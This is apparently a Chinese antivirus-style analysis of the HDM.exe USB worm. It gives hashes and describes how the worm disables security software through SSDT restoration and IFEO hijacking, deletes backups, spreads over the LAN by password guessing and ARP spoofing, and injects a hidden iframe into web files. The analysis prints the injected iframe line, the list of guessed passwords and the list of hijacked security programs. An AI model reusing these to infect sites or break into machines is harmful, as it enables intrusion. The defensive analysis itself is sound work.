这是一个恶性的U盘病毒，其破坏力巨大，主要表现在以下几个方面：
1.使用恢复SSDT的方式破坏杀毒软件
2.IFEO映像劫持
3.关闭指定窗口
4.删除gho文件
5.破坏安全模式，以及显示隐藏文件功能
6.感染htm等网页文件
7.猜测密码通过局域网传播
8.通过U盘等移动存储传播
9.arp欺骗

具体分析如下：
File: HDM.exe
Size: 13312 bytes
Modified: 2007年11月28日, 16:52:08
MD5: 7EC36FA2BCFC1EA72C26B74C928C78F6
SHA1: B60048A8F9DB67EDF4B94BFE4DA2A1906CD33B59
CRC32: 88D8970A

技术细节：
1.病毒运行后，释放如下文件以及副本：
C:\WINDOWS\system32\Winlogon.dll
C:\RESSDT.sys
遍历所有磁盘分区 在磁盘根目录下写入HDM.exe和autorun.inf 以达到通过U盘等移动存储传播的目的

同时建立服务RESSDT
服务相关描述：
启动类型：手动
映像文件路径：c:\RESSDT.sys"
显示名称："RESSDT"
之后加载该驱动 该驱动能够使得某些杀毒软件的API hook失效

2.释放一个GetIp.bat到病毒所在目录下，从而获得IP地址

3.利用ping命令探测同一网段内的其他机器，并把结果写入c:\EnumHost.txt

4.如果查找到同一网段内的其他机器，则通过枚举用户名和密码的方式将HDM.exe复制到其他机器的C,D,E,F盘的根目录下
枚举的用户名和密码如下：
home
movie
alex
love
xp
123
administrator
new
guest
user
game
time
yeah
money
xpuser

123456
qwerty
abc123
memory
12345678
88888
5201314
1314520
asdfgh
angel
asdf
baby
woaini

之后会利用获得当前机器的时间 并利用at命令定时启动该病毒

5.获得系统目录，下载http://*/arp.exe和http://*/winpcap.exe
到系统目录下面
winpcap.exe是嗅探器
arp.exe具有arp欺骗功能，可以向局域网中的其它机器的80端口加入http://www.*/wm.htm的iframe代码

6.遍历磁盘所有分区下面的html,htm,asp,aspx,php,jsp文件
在其尾部加入<iframe src=http://www.*/wm.htm width=0 height=0></iframe>的代码

7.遍历所有磁盘分区删除gho文件

8.在software\microsoft\windows nt\currentversion\image file execution options\下面添加IFEO项目，劫持某些杀毒软件
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FrameworkServices.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
kmp.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
Mcshield.exe
mmqczj.exe
mmsk.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
naPrdMgr.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
regedit.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
RsAgent.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
shcfg32.exe
shstat.exe
SmartUp.exe
SREng.exe
SWEEP95.exe
symlcsvc.exe
SysSafe.exe
Tbmon.exe
TBSCAN.exe
TERegPct.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpdateUI.exe
UpLive.EXE.exe
VsTskMgr.exe
WEBSCANX.exe
WoptiClean.exe
ZONEALARM.exe
zxsweep.exe